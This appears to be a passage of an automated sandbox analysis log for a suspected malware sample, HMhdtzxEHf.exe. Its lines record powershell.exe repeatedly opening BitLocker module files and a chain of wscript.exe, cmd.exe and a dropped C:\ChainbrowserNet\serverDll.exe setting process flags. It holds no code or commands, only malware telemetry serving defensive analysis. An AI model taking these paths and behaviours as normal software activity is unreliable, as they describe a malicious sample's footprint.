                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
